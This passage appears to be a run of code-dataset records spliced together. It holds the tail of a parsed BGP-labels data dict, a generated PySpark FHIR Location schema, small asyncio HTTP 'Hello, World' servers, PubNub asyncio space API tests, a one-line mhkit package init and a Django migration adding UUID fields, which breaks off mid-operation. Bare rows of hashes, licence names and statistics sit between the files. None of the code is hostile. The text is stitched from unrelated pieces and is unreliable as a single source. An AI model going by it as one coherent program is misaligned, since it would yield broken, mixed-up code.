{'prefix':
{'10.85.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.3.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.85.4.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '492288',
'nexthop': '10.76.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '16',
'nexthop': '10.51.1.101',
'out_label': '16',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '17',
'nexthop': '10.51.1.101',
'out_label': '17',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '18',
'nexthop': '10.51.1.101',
'out_label': '18',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.3.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '19',
'nexthop': '10.51.1.101',
'out_label': '19',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}},
'10.94.4.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': '20',
'nexthop': '10.51.1.101',
'out_label': '20',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e',
'vpn': 'VRF1'}}}},
'router_id': '10.81.1.1',
'table_version': 18}}},
'default':
{'address_family':
{'ipv4 unicast':
{'prefix':
{'10.4.0.0/16':
{'index':
{0:
{'best_path': False,
'in_label': 'nolabel',
'nexthop': '0.0.0.0',
'out_label': 'nolabel',
'status': 'invalid',
'type': 'aggregate',
'type_code': 'a'}}},
'10.171.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.171.1.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.171.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.85.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '0.0.0.0',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'redist',
'type_code': 'r'}}}},
'router_id': '10.1.1.1',
'table_version': 17}}}}}
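# A hedged note (harness wiring is an assumption based on genieparser's
# golden-output layout): the equal-test loads the recorded 'show bgp labels'
# device output from the sibling cli/equal fixture and asserts the parsed
# result matches this dict.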
| 50.112195 | 61 | 0.197703 | 529 | 10,273 | 3.659735 | 0.10586 | 0.046488 | 0.077479 | 0.065083 | 0.909091 | 0.909091 | 0.877066 | 0.817665 | 0.807851 | 0.807851 | 0 | 0.100307 | 0.682663 | 10,273 | 204 | 62 | 50.357843 | 0.493558 | 0 | 0 | 0.80198 | 0 | 0 | 0.20222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d1d6a601ddaac5f31d9944ce494f1317d5412dc5 | 21,197 | py | Python | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | 2 | 2020-10-31T23:25:01.000Z | 2021-06-09T14:12:42.000Z | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | null | null | null | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | null | null | null | from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit manually
# noinspection PyPep8Naming
class LocationSchema:
"""
Details and position information for a physical place where services are
provided and resources and participants may be stored, found, contained or
accommodated.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueQuantity",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
) -> Union[StructType, DataType]:
"""
Details and position information for a physical place where services are
provided and resources and participants may be stored, found, contained or
accommodated.
id: The logical id of the resource, as used in the URL for the resource. Once
assigned, this value never changes.
extension: May be used to represent additional information that is not part of the basic
definition of the resource. In order to make the use of extensions safe and
manageable, there is a strict set of governance applied to the definition and
use of extensions. Though any implementer is allowed to define an extension,
there is a set of requirements that SHALL be met as part of the definition of
the extension.
meta: The metadata about the resource. This is content that is maintained by the
infrastructure. Changes to the content may not always be associated with
version changes to the resource.
implicitRules: A reference to a set of rules that were followed when the resource was
constructed, and which must be understood when processing the content.
language: The base language in which the resource is written.
text: A human-readable narrative that contains a summary of the resource, and may be
used to represent the content of the resource to a human. The narrative need
not encode all the structured data, but is required to contain sufficient
detail to make it "clinically safe" for a human to just read the narrative.
Resource definitions may define what content should be represented in the
narrative to ensure clinical safety.
contained: These resources do not have an independent existence apart from the resource
that contains them - they cannot be identified independently, and nor can they
have their own independent transaction scope.
resourceType: This is a Location resource
identifier: Unique code or number identifying the location to its users.
status: The status property covers the general availability of the resource, not the
current value which may be covered by the operationStatus, or by a
schedule/slots if they are configured for the location.
operationalStatus: The Operational status covers operation values most relevant to beds (but can
also apply to rooms/units/chair/etc such as an isolation unit/dialysis chair).
This typically covers concepts such as contamination, housekeeping and other
activities like maintenance.
name: Name of the location as used by humans. Does not need to be unique.
alias: A list of alternate names that the location is known as, or was known as in
the past.
description: Description of the Location, which helps in finding or referencing the place.
mode: Indicates whether a resource instance represents a specific location or a
class of locations.
type: Indicates the type of function performed at the location.
telecom: The contact details of communication devices available at the location. This
can include phone numbers, fax numbers, mobile numbers, email addresses and
web sites.
address: Physical location.
physicalType: Physical form of the location, e.g. building, room, vehicle, road.
position: The absolute geographic location of the Location, expressed using the WGS84
datum (This is the same co-ordinate system used in KML).
managingOrganization: The organization responsible for the provisioning and upkeep of the location.
partOf: Another Location which this Location is physically part of.
endpoint: Technical endpoints providing access to services operated for the location.
"""
from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema
from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema
from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema
from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema
from spark_fhir_schemas.stu3.complex_types.coding import CodingSchema
from spark_fhir_schemas.stu3.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.stu3.complex_types.contactpoint import (
ContactPointSchema,
)
from spark_fhir_schemas.stu3.complex_types.address import AddressSchema
from spark_fhir_schemas.stu3.complex_types.location_position import (
Location_PositionSchema,
)
from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema
if (
max_recursion_limit
and nesting_list.count("Location") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Location"]
schema = StructType(
[
# The logical id of the resource, as used in the URL for the resource. Once
# assigned, this value never changes.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the resource. In order to make the use of extensions safe and
# manageable, there is a strict set of governance applied to the definition and
# use of extensions. Though any implementer is allowed to define an extension,
# there is a set of requirements that SHALL be met as part of the definition of
# the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# The metadata about the resource. This is content that is maintained by the
# infrastructure. Changes to the content may not always be associated with
# version changes to the resource.
StructField(
"meta",
MetaSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# A reference to a set of rules that were followed when the resource was
# constructed, and which must be understood when processing the content.
StructField("implicitRules", StringType(), True),
# The base language in which the resource is written.
StructField("language", StringType(), True),
# A human-readable narrative that contains a summary of the resource, and may be
# used to represent the content of the resource to a human. The narrative need
# not encode all the structured data, but is required to contain sufficient
# detail to make it "clinically safe" for a human to just read the narrative.
# Resource definitions may define what content should be represented in the
# narrative to ensure clinical safety.
StructField(
"text",
NarrativeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# These resources do not have an independent existence apart from the resource
# that contains them - they cannot be identified independently, and nor can they
# have their own independent transaction scope.
StructField(
"contained",
ArrayType(
ResourceListSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# This is a Location resource
StructField("resourceType", StringType(), True),
# Unique code or number identifying the location to its users.
StructField(
"identifier",
ArrayType(
IdentifierSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# The status property covers the general availability of the resource, not the
# current value which may be covered by the operationStatus, or by a
# schedule/slots if they are configured for the location.
StructField("status", StringType(), True),
# The Operational status covers operation values most relevant to beds (but can
# also apply to rooms/units/chair/etc such as an isolation unit/dialysis chair).
# This typically covers concepts such as contamination, housekeeping and other
# activities like maintenance.
StructField(
"operationalStatus",
CodingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Name of the location as used by humans. Does not need to be unique.
StructField("name", StringType(), True),
# A list of alternate names that the location is known as, or was known as in
# the past.
StructField("alias", ArrayType(StringType()), True),
# Description of the Location, which helps in finding or referencing the place.
StructField("description", StringType(), True),
# Indicates whether a resource instance represents a specific location or a
# class of locations.
StructField("mode", StringType(), True),
# Indicates the type of function performed at the location.
StructField(
"type",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The contact details of communication devices available at the location. This
# can include phone numbers, fax numbers, mobile numbers, email addresses and
# web sites.
StructField(
"telecom",
ArrayType(
ContactPointSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# Physical location.
StructField(
"address",
AddressSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Physical form of the location, e.g. building, room, vehicle, road.
StructField(
"physicalType",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The absolute geographic location of the Location, expressed using the WGS84
# datum (This is the same co-ordinate system used in KML).
StructField(
"position",
Location_PositionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The organization responsible for the provisioning and upkeep of the location.
StructField(
"managingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Another Location which this Location is physically part of.
StructField(
"partOf",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Technical endpoints providing access to services operated for the location.
StructField(
"endpoint",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
return schema
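# A hedged usage sketch (not part of the generated module): building the schema
# needs no SparkSession, so the top-level field names can be inspected directly.
if __name__ == "__main__":
    location_schema = LocationSchema.get_schema()
    print([field.name for field in location_schema.fields])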
| 50.229858 | 107 | 0.562061 | 2,033 | 21,197 | 5.664043 | 0.166749 | 0.063569 | 0.040382 | 0.058359 | 0.802518 | 0.79201 | 0.79201 | 0.760747 | 0.760052 | 0.735736 | 0 | 0.003427 | 0.394207 | 21,197 | 421 | 108 | 50.349169 | 0.89331 | 0.32731 | 0 | 0.640288 | 1 | 0 | 0.027125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003597 | false | 0 | 0.046763 | 0 | 0.061151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae1a6a35679aaf2d03bfc63a1c7d1248b30de98a | 716 | py | Python | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 5,300 | 2015-01-02T08:04:20.000Z | 2022-03-31T10:08:33.000Z | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 3,075 | 2015-01-01T05:11:45.000Z | 2022-03-31T23:56:33.000Z | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 2,151 | 2015-01-02T14:16:09.000Z | 2022-03-30T00:15:26.000Z | import asyncio
import ujson
from ..utils.yocto_http.utils import generate_http_response
class YoctoHttpJson(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
# Ignore the request bytes; reply to every request with the same canned JSON payload.
payload = ujson.dumps({'message': 'Hello, World!'})
self.transport.write(generate_http_response(payload))
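# A hedged wiring sketch (host/port are assumptions; api_hour's container
# normally performs this setup): a bare asyncio loop can serve either
# protocol directly.
#
#   loop = asyncio.get_event_loop()
#   loop.run_until_complete(loop.create_server(YoctoHttpJson, '127.0.0.1', 8080))
#   loop.run_forever()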
class YoctoHttpText(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
# Ignore the request bytes; reply with the same canned plain-text payload.
payload = 'Hello, World!'
self.transport.write(generate_http_response(payload, 'text/plain; charset=UTF-8')) | 31.130435 | 90 | 0.705307 | 83 | 716 | 5.951807 | 0.373494 | 0.210526 | 0.145749 | 0.11336 | 0.704453 | 0.704453 | 0.704453 | 0.704453 | 0.704453 | 0.481781 | 0 | 0.001712 | 0.184358 | 716 | 23 | 90 | 31.130435 | 0.844178 | 0.074022 | 0 | 0.4 | 1 | 0 | 0.087746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
ae57076a009da072587b3aec5af8dd03fc5a112a | 4,509 | py | Python | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | 1 | 2021-09-29T05:07:57.000Z | 2021-09-29T05:07:57.000Z | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | null | null | null | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | null | null | null | import pytest
from tests.helper import pnconf_obj_copy
from tests.integrational.vcr_helper import pn_vcr
from pubnub.pubnub_asyncio import PubNubAsyncio, AsyncioEnvelope
from pubnub.models.consumer.space import (PNGetSpacesResult, PNCreateSpaceResult, PNGetSpaceResult,
PNUpdateSpaceResult, PNDeleteSpaceResult)
from pubnub.models.consumer.common import PNStatus
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/get_spaces.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_get_spaces(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.get_spaces().include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNGetSpacesResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert len(data) == 100
assert set(['name', 'id', 'description', 'custom', 'created', 'updated', 'eTag']) == set(data[0])
assert set(['name', 'id', 'description', 'custom', 'created', 'updated', 'eTag']) == set(data[1])
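# A hedged note on the fixture wiring (cassette paths come from the decorators
# above): pn_vcr replays the recorded HTTP exchanges, so these tests run
# without live PubNub credentials; 'uuid', 'seqn', and 'pnsdk' are filtered
# because they vary per request.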
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/create_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_create_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.create_space().data({'id': 'in_space', 'name': 'some_name',
'custom': {'a': 3}}).include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNCreateSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] is None
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/get_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_get_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.get_space().space_id('in_space').include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNGetSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert set(['name', 'id', 'description', 'created', 'updated', 'eTag', 'custom']) == set(data)
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] is None
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/update_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_update_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
data = {'description': 'desc'}
envelope = yield from pn.update_space().space_id('in_space').data(data).include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNUpdateSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert set(['name', 'id', 'description', 'created', 'updated', 'eTag', 'custom']) == set(data)
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] == 'desc'
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/delete_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_delete_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.delete_space().space_id('in_space').future()
    assert isinstance(envelope, AsyncioEnvelope)
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNDeleteSpaceResult)
assert isinstance(envelope.status, PNStatus)
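
# The Objects API calls above all follow one pattern: build the request
# fluently, yield its future, then inspect ``envelope.result`` and
# ``envelope.status``. A sketch mirroring the tests (not an extra test case):
#
#     envelope = yield from pn.get_space().space_id('in_space').future()
#     if not envelope.status.is_error():
#         data = envelope.result.data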
| 44.205882 | 102 | 0.697937 | 532 | 4,509 | 5.738722 | 0.142857 | 0.044219 | 0.117917 | 0.026204 | 0.811333 | 0.780216 | 0.780216 | 0.780216 | 0.780216 | 0.744841 | 0 | 0.002385 | 0.163007 | 4,509 | 101 | 103 | 44.643564 | 0.806571 | 0 | 0 | 0.611765 | 0 | 0 | 0.165003 | 0.065425 | 0 | 0 | 0 | 0 | 0.435294 | 1 | 0.058824 | false | 0 | 0.070588 | 0 | 0.129412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
882512bc4e2b1e6ea1fcddd04645d589ad79d1ca | 131 | py | Python | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 21 | 2020-04-20T19:10:03.000Z | 2022-03-30T18:46:03.000Z | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 110 | 2020-03-06T22:11:08.000Z | 2022-03-25T20:28:36.000Z | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 32 | 2020-03-05T20:33:10.000Z | 2022-03-24T20:19:34.000Z | from mhkit.river import performance
from mhkit.river import graphics
from mhkit.river import io
from mhkit.river import resource
| 26.2 | 36 | 0.832061 | 20 | 131 | 5.45 | 0.4 | 0.330275 | 0.513761 | 0.733945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137405 | 131 | 4 | 37 | 32.75 | 0.964602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8845f1744edd987aba8176f97bdfb0192fa42234 | 4,269 | py | Python | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
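
# Each model gains a nullable UUID column: "uuid2" where a "uuid" field
# already exists, plain "uuid" otherwise; the existing CharField "uuid"
# columns on machinerequest and resourcerequest are also relaxed to
# nullable below. Presumably a follow-up migration backfills these and
# swaps them in for the old identifiers.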
class Migration(migrations.Migration):
dependencies = [
('core', '0032_alter_machine_request'),
]
operations = [
migrations.AddField(
model_name='application',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='cloudadministrator',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='identity',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='machinerequest',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='project',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='provider',
name='uuid2',
field=models.UUIDField(null=True),
),
######################################
migrations.AddField(
model_name='allocation',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='atmosphereuser',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='applicationbookmark',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='bootscript',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='credential',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='group',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='identitymembership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancemembership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancesource',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='leadership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancestatushistory',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='license',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='providercredential',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='quota',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='resourcerequest',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='size',
name='uuid',
